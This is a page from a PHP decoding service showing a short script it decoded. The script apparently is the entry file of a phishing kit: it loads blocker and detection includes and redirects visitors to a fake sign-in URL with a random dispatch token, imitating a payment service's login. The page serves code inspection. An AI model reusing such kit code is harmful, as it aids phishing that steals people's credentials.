Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // Dsactiver le rapport d'erreurs error_reporting(0); // Rapporte les erreurs..

Decoded Output download

<?php 
 
// Dsactiver le rapport d'erreurs 
error_reporting(0); 
 
// Rapporte les erreurs d'excution de script 
error_reporting(E_ERROR | E_WARNING | E_PARSE); 
 
// Rapporter les E_NOTICE peut vous aider  amliorer vos scripts 
// (variables non initialises, variables mal orthographies..) 
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); 
 
// Rapporte toutes les erreurs  part les E_NOTICE 
// C'est la configuration par dfaut de php.ini 
error_reporting(E_ALL & ~E_NOTICE); 
 
// Reporte toutes les erreurs PHP (Voir l'historique des modifications) 
error_reporting(E_ALL); 
 
// Reporte toutes les erreurs PHP 
error_reporting(-1); 
include("system/blocker.php"); 
include("system/detect.php"); 
$random = rand(0,100000000000); 
$dis    = substr(md5($random), 0, 25); 
header('Location: login?cmd=_signin&dispatch='.$dis.'&locale=en_'.$countrycode.''); 
?>

Did this file decode correctly?

Original Code

<?php

// Dsactiver le rapport d'erreurs
error_reporting(0);

// Rapporte les erreurs d'excution de script
error_reporting(E_ERROR | E_WARNING | E_PARSE);

// Rapporter les E_NOTICE peut vous aider  amliorer vos scripts
// (variables non initialises, variables mal orthographies..)
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);

// Rapporte toutes les erreurs  part les E_NOTICE
// C'est la configuration par dfaut de php.ini
error_reporting(E_ALL & ~E_NOTICE);

// Reporte toutes les erreurs PHP (Voir l'historique des modifications)
error_reporting(E_ALL);

// Reporte toutes les erreurs PHP
error_reporting(-1);
include("system/blocker.php");
include("system/detect.php");
$random = rand(0,100000000000);
$dis    = substr(md5($random), 0, 25);
header('Location: login?cmd=_signin&dispatch='.$dis.'&locale=en_'.$countrycode.'');
?>

Function Calls

error_reporting 1

Variables

None

Stats

MD5 4b52b1ae5f52a02378681e9489d6e592
Eval Count 0
Decode Time 89 ms